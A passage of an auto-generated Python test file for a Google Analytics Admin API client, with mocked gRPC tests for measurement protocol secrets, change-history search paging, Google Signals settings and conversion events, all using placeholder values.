request object and flattened # fields is an error. with pytest.raises(ValueError): await client.delete_measurement_protocol_secret( analytics_admin.DeleteMeasurementProtocolSecretRequest(), name="name_value", ) def test_update_measurement_protocol_secret( transport: str = "grpc", request_type=analytics_admin.UpdateMeasurementProtocolSecretRequest, ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_measurement_protocol_secret), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.MeasurementProtocolSecret( name="name_value", display_name="display_name_value", secret_value="secret_value_value", ) response = client.update_measurement_protocol_secret(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateMeasurementProtocolSecretRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.MeasurementProtocolSecret) assert response.name == "name_value" assert response.display_name == "display_name_value" assert response.secret_value == "secret_value_value" def test_update_measurement_protocol_secret_from_dict(): test_update_measurement_protocol_secret(request_type=dict) def test_update_measurement_protocol_secret_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_measurement_protocol_secret), "__call__" ) as call: client.update_measurement_protocol_secret() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateMeasurementProtocolSecretRequest() @pytest.mark.asyncio async def test_update_measurement_protocol_secret_async( transport: str = "grpc_asyncio", request_type=analytics_admin.UpdateMeasurementProtocolSecretRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_measurement_protocol_secret), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.MeasurementProtocolSecret( name="name_value", display_name="display_name_value", secret_value="secret_value_value", ) ) response = await client.update_measurement_protocol_secret(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateMeasurementProtocolSecretRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.MeasurementProtocolSecret) assert response.name == "name_value" assert response.display_name == "display_name_value" assert response.secret_value == "secret_value_value" @pytest.mark.asyncio async def test_update_measurement_protocol_secret_async_from_dict(): await test_update_measurement_protocol_secret_async(request_type=dict) def test_update_measurement_protocol_secret_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.UpdateMeasurementProtocolSecretRequest() request.measurement_protocol_secret.name = "measurement_protocol_secret.name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_measurement_protocol_secret), "__call__" ) as call: call.return_value = resources.MeasurementProtocolSecret() client.update_measurement_protocol_secret(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ( "x-goog-request-params", "measurement_protocol_secret.name=measurement_protocol_secret.name/value", ) in kw["metadata"] @pytest.mark.asyncio async def test_update_measurement_protocol_secret_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.UpdateMeasurementProtocolSecretRequest() request.measurement_protocol_secret.name = "measurement_protocol_secret.name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_measurement_protocol_secret), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.MeasurementProtocolSecret() ) await client.update_measurement_protocol_secret(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ( "x-goog-request-params", "measurement_protocol_secret.name=measurement_protocol_secret.name/value", ) in kw["metadata"] def test_update_measurement_protocol_secret_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_measurement_protocol_secret), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.MeasurementProtocolSecret() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.update_measurement_protocol_secret( measurement_protocol_secret=resources.MeasurementProtocolSecret( name="name_value" ), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[ 0 ].measurement_protocol_secret == resources.MeasurementProtocolSecret( name="name_value" ) assert args[0].update_mask == field_mask_pb2.FieldMask(paths=["paths_value"]) def test_update_measurement_protocol_secret_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.update_measurement_protocol_secret( analytics_admin.UpdateMeasurementProtocolSecretRequest(), measurement_protocol_secret=resources.MeasurementProtocolSecret( name="name_value" ), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) @pytest.mark.asyncio async def test_update_measurement_protocol_secret_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_measurement_protocol_secret), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.MeasurementProtocolSecret() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.MeasurementProtocolSecret() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.update_measurement_protocol_secret( measurement_protocol_secret=resources.MeasurementProtocolSecret( name="name_value" ), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[ 0 ].measurement_protocol_secret == resources.MeasurementProtocolSecret( name="name_value" ) assert args[0].update_mask == field_mask_pb2.FieldMask(paths=["paths_value"]) @pytest.mark.asyncio async def test_update_measurement_protocol_secret_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.update_measurement_protocol_secret( analytics_admin.UpdateMeasurementProtocolSecretRequest(), measurement_protocol_secret=resources.MeasurementProtocolSecret( name="name_value" ), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) def test_search_change_history_events( transport: str = "grpc", request_type=analytics_admin.SearchChangeHistoryEventsRequest, ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.search_change_history_events), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.SearchChangeHistoryEventsResponse( next_page_token="next_page_token_value", ) response = client.search_change_history_events(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.SearchChangeHistoryEventsRequest() # Establish that the response is the type that we expect. assert isinstance(response, pagers.SearchChangeHistoryEventsPager) assert response.next_page_token == "next_page_token_value" def test_search_change_history_events_from_dict(): test_search_change_history_events(request_type=dict) def test_search_change_history_events_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.search_change_history_events), "__call__" ) as call: client.search_change_history_events() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.SearchChangeHistoryEventsRequest() @pytest.mark.asyncio async def test_search_change_history_events_async( transport: str = "grpc_asyncio", request_type=analytics_admin.SearchChangeHistoryEventsRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.search_change_history_events), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.SearchChangeHistoryEventsResponse( next_page_token="next_page_token_value", ) ) response = await client.search_change_history_events(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.SearchChangeHistoryEventsRequest() # Establish that the response is the type that we expect. assert isinstance(response, pagers.SearchChangeHistoryEventsAsyncPager) assert response.next_page_token == "next_page_token_value" @pytest.mark.asyncio async def test_search_change_history_events_async_from_dict(): await test_search_change_history_events_async(request_type=dict) def test_search_change_history_events_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.SearchChangeHistoryEventsRequest() request.account = "account/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.search_change_history_events), "__call__" ) as call: call.return_value = analytics_admin.SearchChangeHistoryEventsResponse() client.search_change_history_events(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "account=account/value",) in kw["metadata"] @pytest.mark.asyncio async def test_search_change_history_events_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.SearchChangeHistoryEventsRequest() request.account = "account/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.search_change_history_events), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.SearchChangeHistoryEventsResponse() ) await client.search_change_history_events(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "account=account/value",) in kw["metadata"] def test_search_change_history_events_pager(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.search_change_history_events), "__call__" ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.SearchChangeHistoryEventsResponse( change_history_events=[ resources.ChangeHistoryEvent(), resources.ChangeHistoryEvent(), resources.ChangeHistoryEvent(), ], next_page_token="abc", ), analytics_admin.SearchChangeHistoryEventsResponse( change_history_events=[], next_page_token="def", ), analytics_admin.SearchChangeHistoryEventsResponse( change_history_events=[resources.ChangeHistoryEvent(),], next_page_token="ghi", ), analytics_admin.SearchChangeHistoryEventsResponse( change_history_events=[ resources.ChangeHistoryEvent(), resources.ChangeHistoryEvent(), ], ), RuntimeError, ) metadata = () metadata = tuple(metadata) + ( gapic_v1.routing_header.to_grpc_metadata((("account", ""),)), ) pager = client.search_change_history_events(request={}) assert pager._metadata == metadata results = [i for i in pager] assert len(results) == 6 assert all(isinstance(i, resources.ChangeHistoryEvent) for i in results) def test_search_change_history_events_pages(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.search_change_history_events), "__call__" ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.SearchChangeHistoryEventsResponse( change_history_events=[ resources.ChangeHistoryEvent(), resources.ChangeHistoryEvent(), resources.ChangeHistoryEvent(), ], next_page_token="abc", ), analytics_admin.SearchChangeHistoryEventsResponse( change_history_events=[], next_page_token="def", ), analytics_admin.SearchChangeHistoryEventsResponse( change_history_events=[resources.ChangeHistoryEvent(),], next_page_token="ghi", ), analytics_admin.SearchChangeHistoryEventsResponse( change_history_events=[ resources.ChangeHistoryEvent(), resources.ChangeHistoryEvent(), ], ), RuntimeError, ) pages = list(client.search_change_history_events(request={}).pages) for page_, token in zip(pages, ["abc", "def", "ghi", ""]): assert page_.raw_page.next_page_token == token @pytest.mark.asyncio async def test_search_change_history_events_async_pager(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.search_change_history_events), "__call__", new_callable=mock.AsyncMock, ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.SearchChangeHistoryEventsResponse( change_history_events=[ resources.ChangeHistoryEvent(), resources.ChangeHistoryEvent(), resources.ChangeHistoryEvent(), ], next_page_token="abc", ), analytics_admin.SearchChangeHistoryEventsResponse( change_history_events=[], next_page_token="def", ), analytics_admin.SearchChangeHistoryEventsResponse( change_history_events=[resources.ChangeHistoryEvent(),], next_page_token="ghi", ), analytics_admin.SearchChangeHistoryEventsResponse( change_history_events=[ resources.ChangeHistoryEvent(), resources.ChangeHistoryEvent(), ], ), RuntimeError, ) async_pager = await client.search_change_history_events(request={},) assert async_pager.next_page_token == "abc" responses = [] async for response in async_pager: responses.append(response) assert len(responses) == 6 assert all(isinstance(i, resources.ChangeHistoryEvent) for i in responses) @pytest.mark.asyncio async def test_search_change_history_events_async_pages(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.search_change_history_events), "__call__", new_callable=mock.AsyncMock, ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.SearchChangeHistoryEventsResponse( change_history_events=[ resources.ChangeHistoryEvent(), resources.ChangeHistoryEvent(), resources.ChangeHistoryEvent(), ], next_page_token="abc", ), analytics_admin.SearchChangeHistoryEventsResponse( change_history_events=[], next_page_token="def", ), analytics_admin.SearchChangeHistoryEventsResponse( change_history_events=[resources.ChangeHistoryEvent(),], next_page_token="ghi", ), analytics_admin.SearchChangeHistoryEventsResponse( change_history_events=[ resources.ChangeHistoryEvent(), resources.ChangeHistoryEvent(), ], ), RuntimeError, ) pages = [] async for page_ in ( await client.search_change_history_events(request={}) ).pages: pages.append(page_) for page_, token in zip(pages, ["abc", "def", "ghi", ""]): assert page_.raw_page.next_page_token == token def test_get_google_signals_settings( transport: str = "grpc", request_type=analytics_admin.GetGoogleSignalsSettingsRequest, ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_google_signals_settings), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.GoogleSignalsSettings( name="name_value", state=resources.GoogleSignalsState.GOOGLE_SIGNALS_ENABLED, consent=resources.GoogleSignalsConsent.GOOGLE_SIGNALS_CONSENT_CONSENTED, ) response = client.get_google_signals_settings(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetGoogleSignalsSettingsRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.GoogleSignalsSettings) assert response.name == "name_value" assert response.state == resources.GoogleSignalsState.GOOGLE_SIGNALS_ENABLED assert ( response.consent == resources.GoogleSignalsConsent.GOOGLE_SIGNALS_CONSENT_CONSENTED ) def test_get_google_signals_settings_from_dict(): test_get_google_signals_settings(request_type=dict) def test_get_google_signals_settings_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_google_signals_settings), "__call__" ) as call: client.get_google_signals_settings() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetGoogleSignalsSettingsRequest() @pytest.mark.asyncio async def test_get_google_signals_settings_async( transport: str = "grpc_asyncio", request_type=analytics_admin.GetGoogleSignalsSettingsRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_google_signals_settings), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.GoogleSignalsSettings( name="name_value", state=resources.GoogleSignalsState.GOOGLE_SIGNALS_ENABLED, consent=resources.GoogleSignalsConsent.GOOGLE_SIGNALS_CONSENT_CONSENTED, ) ) response = await client.get_google_signals_settings(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetGoogleSignalsSettingsRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.GoogleSignalsSettings) assert response.name == "name_value" assert response.state == resources.GoogleSignalsState.GOOGLE_SIGNALS_ENABLED assert ( response.consent == resources.GoogleSignalsConsent.GOOGLE_SIGNALS_CONSENT_CONSENTED ) @pytest.mark.asyncio async def test_get_google_signals_settings_async_from_dict(): await test_get_google_signals_settings_async(request_type=dict) def test_get_google_signals_settings_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.GetGoogleSignalsSettingsRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_google_signals_settings), "__call__" ) as call: call.return_value = resources.GoogleSignalsSettings() client.get_google_signals_settings(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] @pytest.mark.asyncio async def test_get_google_signals_settings_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.GetGoogleSignalsSettingsRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_google_signals_settings), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.GoogleSignalsSettings() ) await client.get_google_signals_settings(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] def test_get_google_signals_settings_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_google_signals_settings), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.GoogleSignalsSettings() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.get_google_signals_settings(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" def test_get_google_signals_settings_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.get_google_signals_settings( analytics_admin.GetGoogleSignalsSettingsRequest(), name="name_value", ) @pytest.mark.asyncio async def test_get_google_signals_settings_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_google_signals_settings), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.GoogleSignalsSettings() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.GoogleSignalsSettings() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.get_google_signals_settings(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" @pytest.mark.asyncio async def test_get_google_signals_settings_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.get_google_signals_settings( analytics_admin.GetGoogleSignalsSettingsRequest(), name="name_value", ) def test_update_google_signals_settings( transport: str = "grpc", request_type=analytics_admin.UpdateGoogleSignalsSettingsRequest, ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_google_signals_settings), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.GoogleSignalsSettings( name="name_value", state=resources.GoogleSignalsState.GOOGLE_SIGNALS_ENABLED, consent=resources.GoogleSignalsConsent.GOOGLE_SIGNALS_CONSENT_CONSENTED, ) response = client.update_google_signals_settings(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateGoogleSignalsSettingsRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.GoogleSignalsSettings) assert response.name == "name_value" assert response.state == resources.GoogleSignalsState.GOOGLE_SIGNALS_ENABLED assert ( response.consent == resources.GoogleSignalsConsent.GOOGLE_SIGNALS_CONSENT_CONSENTED ) def test_update_google_signals_settings_from_dict(): test_update_google_signals_settings(request_type=dict) def test_update_google_signals_settings_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_google_signals_settings), "__call__" ) as call: client.update_google_signals_settings() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateGoogleSignalsSettingsRequest() @pytest.mark.asyncio async def test_update_google_signals_settings_async( transport: str = "grpc_asyncio", request_type=analytics_admin.UpdateGoogleSignalsSettingsRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_google_signals_settings), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.GoogleSignalsSettings( name="name_value", state=resources.GoogleSignalsState.GOOGLE_SIGNALS_ENABLED, consent=resources.GoogleSignalsConsent.GOOGLE_SIGNALS_CONSENT_CONSENTED, ) ) response = await client.update_google_signals_settings(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateGoogleSignalsSettingsRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.GoogleSignalsSettings) assert response.name == "name_value" assert response.state == resources.GoogleSignalsState.GOOGLE_SIGNALS_ENABLED assert ( response.consent == resources.GoogleSignalsConsent.GOOGLE_SIGNALS_CONSENT_CONSENTED ) @pytest.mark.asyncio async def test_update_google_signals_settings_async_from_dict(): await test_update_google_signals_settings_async(request_type=dict) def test_update_google_signals_settings_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.UpdateGoogleSignalsSettingsRequest() request.google_signals_settings.name = "google_signals_settings.name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_google_signals_settings), "__call__" ) as call: call.return_value = resources.GoogleSignalsSettings() client.update_google_signals_settings(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ( "x-goog-request-params", "google_signals_settings.name=google_signals_settings.name/value", ) in kw["metadata"] @pytest.mark.asyncio async def test_update_google_signals_settings_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.UpdateGoogleSignalsSettingsRequest() request.google_signals_settings.name = "google_signals_settings.name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_google_signals_settings), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.GoogleSignalsSettings() ) await client.update_google_signals_settings(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ( "x-goog-request-params", "google_signals_settings.name=google_signals_settings.name/value", ) in kw["metadata"] def test_update_google_signals_settings_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_google_signals_settings), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.GoogleSignalsSettings() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.update_google_signals_settings( google_signals_settings=resources.GoogleSignalsSettings(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].google_signals_settings == resources.GoogleSignalsSettings( name="name_value" ) assert args[0].update_mask == field_mask_pb2.FieldMask(paths=["paths_value"]) def test_update_google_signals_settings_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.update_google_signals_settings( analytics_admin.UpdateGoogleSignalsSettingsRequest(), google_signals_settings=resources.GoogleSignalsSettings(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) @pytest.mark.asyncio async def test_update_google_signals_settings_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_google_signals_settings), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.GoogleSignalsSettings() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.GoogleSignalsSettings() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.update_google_signals_settings( google_signals_settings=resources.GoogleSignalsSettings(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].google_signals_settings == resources.GoogleSignalsSettings( name="name_value" ) assert args[0].update_mask == field_mask_pb2.FieldMask(paths=["paths_value"]) @pytest.mark.asyncio async def test_update_google_signals_settings_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.update_google_signals_settings( analytics_admin.UpdateGoogleSignalsSettingsRequest(), google_signals_settings=resources.GoogleSignalsSettings(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) def test_create_conversion_event( transport: str = "grpc", request_type=analytics_admin.CreateConversionEventRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_conversion_event), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.ConversionEvent( name="name_value", event_name="event_name_value", deletable=True, custom=True, ) response = client.create_conversion_event(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.CreateConversionEventRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.ConversionEvent) assert response.name == "name_value" assert response.event_name == "event_name_value" assert response.deletable is True assert response.custom is True def test_create_conversion_event_from_dict(): test_create_conversion_event(request_type=dict) def test_create_conversion_event_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = 